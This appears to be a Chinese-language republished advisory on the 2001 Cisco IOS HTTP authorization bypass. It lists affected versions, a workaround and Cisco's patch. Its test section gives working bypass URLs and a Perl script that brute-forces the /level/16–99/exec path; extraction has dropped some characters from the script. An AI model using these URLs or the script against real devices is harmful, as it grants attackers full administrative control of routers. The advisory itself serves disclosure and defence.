IOSWeb配置接口安全认证可被绕过

发表于:2007-06-23来源:作者:点击数: 标签:
发布日期: 2001-6-27 更新日期: 2001-7-3 受影响的系统: Cisco IOS 12.2XQ Cisco IOS 12.2XH Cisco IOS 12.2XE Cisco IOS 12.2XD Cisco IOS 12.2XA Cisco IOS 12.2T Cisco IOS 12.2 Cisco IOS 12.1YF Cisco IOS 12.1YD Cisco IOS 12.1YC Cisco IOS 12.1YB Ci

   
  发布日期: 2001-6-27
  
  
  
  更新日期: 2001-7-3
  
  受影响的系统:
  
  Cisco IOS 12.2XQ
  
  Cisco IOS 12.2XH
  
  Cisco IOS 12.2XE
  

  Cisco IOS 12.2XD
  
  Cisco IOS 12.2XA
  
  Cisco IOS 12.2T
  
  Cisco IOS 12.2
  
  Cisco IOS 12.1YF
  
  Cisco IOS 12.1YD
  
  Cisco IOS 12.1YC
  
  Cisco IOS 12.1YB
  
  Cisco IOS 12.1YA
  
  Cisco IOS 12.1XZ
  
  Cisco IOS 12.1XY
  
  Cisco IOS 12.1XX
  
  Cisco IOS 12.1XW
  
  Cisco IOS 12.1XV
  
  Cisco IOS 12.1XU
  
  Cisco IOS 12.1XT
  
  Cisco IOS 12.1XS
  
  Cisco IOS 12.1XR
  
  Cisco IOS 12.1XQ
  
  Cisco IOS 12.1XP
  
  Cisco IOS 12.1XM
  
  Cisco IOS 12.1XL
  
  Cisco IOS 12.1XK
  
  Cisco IOS 12.1XJ
  
  Cisco IOS 12.1XI
  
  Cisco IOS 12.1XH
  
  Cisco IOS 12.1XG
  
  Cisco IOS 12.1XF
  
  Cisco IOS 12.1XE
  
  Cisco IOS 12.1XD
  
  Cisco IOS 12.1XC
  
  Cisco IOS 12.1XB
  
  Cisco IOS 12.1XA
  
  Cisco IOS 12.1T
  
  Cisco IOS 12.1EZ
  
  Cisco IOS 12.1EY
  
  Cisco IOS 12.1EX
  
  Cisco IOS 12.1EC
  
  Cisco IOS 12.1E
  
  Cisco IOS 12.1DC
  
  Cisco IOS 12.1DB
  
  Cisco IOS 12.1DA
  
  Cisco IOS 12.1CX
  
  Cisco IOS 12.1AA
  
  Cisco IOS 12.1
  
  Cisco IOS 12.0XV
  
  Cisco IOS 12.0XU
  
  Cisco IOS 12.0XS
  
  Cisco IOS 12.0XR
  
  Cisco IOS 12.0XQ
  
  Cisco IOS 12.0XP
  
  Cisco IOS 12.0XN
  
  Cisco IOS 12.0XM
  
  Cisco IOS 12.0XL
  
  Cisco IOS 12.0XJ
  
  Cisco IOS 12.0XI
  
  Cisco IOS 12.0XH
  
  Cisco IOS 12.0XG
  
  Cisco IOS 12.0XF
  
  Cisco IOS 12.0XE
  
  Cisco IOS 12.0XD
  
  Cisco IOS 12.0XC
  
  Cisco IOS 12.0XB
  
  Cisco IOS 12.0XA
  
  Cisco IOS 12.0WT
  
  Cisco IOS 12.0WC
  
  Cisco IOS 12.0T
  
  Cisco IOS 12.0ST
  
  Cisco IOS 12.0SL
  
  Cisco IOS 12.0SC
  
  Cisco IOS 12.0S
  
  Cisco IOS 12.0DC
  
  Cisco IOS 12.0DB
  
  Cisco IOS 12.0DA
  
  Cisco IOS 12.0(7)XK
  
  Cisco IOS 12.0(5)XK
  
  Cisco IOS 12.0(14)W5(20)
  
  Cisco IOS 12.0(10)W5(18g)
  
  Cisco IOS 12.0
  
  Cisco IOS 11.3XA
  
  Cisco IOS 11.3T
  
  Cisco IOS 11.3NA
  
  Cisco IOS 11.3MA
  
  Cisco IOS 11.3HA
  
  Cisco IOS 11.3DB
  
  Cisco IOS 11.3DA
  
  Cisco IOS 11.3AA
  
  Cisco IOS 11.3
  
  
  
  不受影响系统:
  
  Cisco IOS 11.2
  
  Cisco IOS 11.1
  
  Cisco IOS 11.0
  
  Cisco IOS 10.3
  
  描述:
  
  ------------------------------------------------------------------------
  
  --------
  
  
  
  
  
  BUGTRAQ ID : 2936
  
  
  
  IOS 是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换
  
  机)。
  
  
  
  在Cisco IOS 11.3开始的版本存在一个安全问题,如果它开放了web管理接口,将
  
  允许任
  
  意远程攻击者获取该设备的完全的管理权限。攻击者只需要构造一个如下的URL:
  
  
  
  http:///level/xx/exec/....
  
  
  
  这里的xx是一个从16-99之间的整数。对于不同的设备,这个数值可能是不同的,
  
  但是攻
  
  击者仅需要测试84次即可找到正确的数值。
  
  
  
  这个问题可能导致远程用户获取完全的管理权限,并进一步对网络进行渗透,也可
  
  能造成
  
  拒绝服务攻击漏洞。
  
  
  
  
  
  <*来源:David Hyams (david.hyams@kmu-security.ch) *>
  
  
  
  
  
  测试程序:
  
  ------------------------------------------------------------------------
  
  --------
  
  
  
  警 告
  
  
  
  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
  
  
  
  
  
  
  
  Half Adder 提供了如下测试代码:
  
  
  
  http:///level/42/configure/-/banner/motd/LINE
  
  http:///level/xx/configure
  
  http:///level/42/exec/show%20conf
  
  
  
  Ertan Kurt 提供了如下测试代码:
  
  
  
  #!/usr/bin/perl
  
  # modified roelof's uni.pl
  
  # to check cisco ios http auth bug
  
  # cronos
  
  use Socket;
  
  print "enter IP (x.x.x.x): ";
  
  $host= ;
  
  chop($host);
  
  $i=16;
  
  $port=80;
  
  $target = .net_aton($host);
  
  $flag=0;
  
  LINE: while ($i<100) {
  
  # ------------- Sendraw - thanx RFP rfp@wiretrip.net
  
  my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
  
  foreach $line (@results){
  
  $line=~ tr/A-Z/a-z/;
  
  if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
  
  if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
  
  }
  
  if ($flag==1){print "Not Vulnerable with $i\n\r";}
  
  else {print "$line Vulnerable with $i\n\r"; last LINE;
  
  }
  
  $i++;
  
  sub sendraw {
  
  my ($pstr)=@_;
  
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  
  die("Socket problems\n");
  
  if(connect(S,pack "SnA4x8",2,$port,$target)){
  
  my @in;
  
  select(S); $|=1; print $pstr;
  
  while(){ push @in, $_;}
  
   select(STDOUT); close(S); return @in;
  
   } else { die("Can't connect...\n"); }
  
  }
  
  }
  
  
  
  
  
  
  
  ------------------------------------------------------------------------
  
  --------
  
  建议:
  
  
  
  临时解决方法:
  
  
  
  
  
  暂时禁止有问题设备的web管理.
  
  
  
  厂商补丁:
  
  
  
  Cisco已经为此提供了发布了一个安全公告:
  
  "Cisco Security Advisory: IOS HTTP Authorization Vulnerability"
  
  
  
  您可以在下列地址看到公告的详细内容,同时根据您使用的Cisco设备的型号,选
  
  择
  
  相应的补丁或升级版本:
  
  
  
  http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

原文转自:http://www.ltesting.net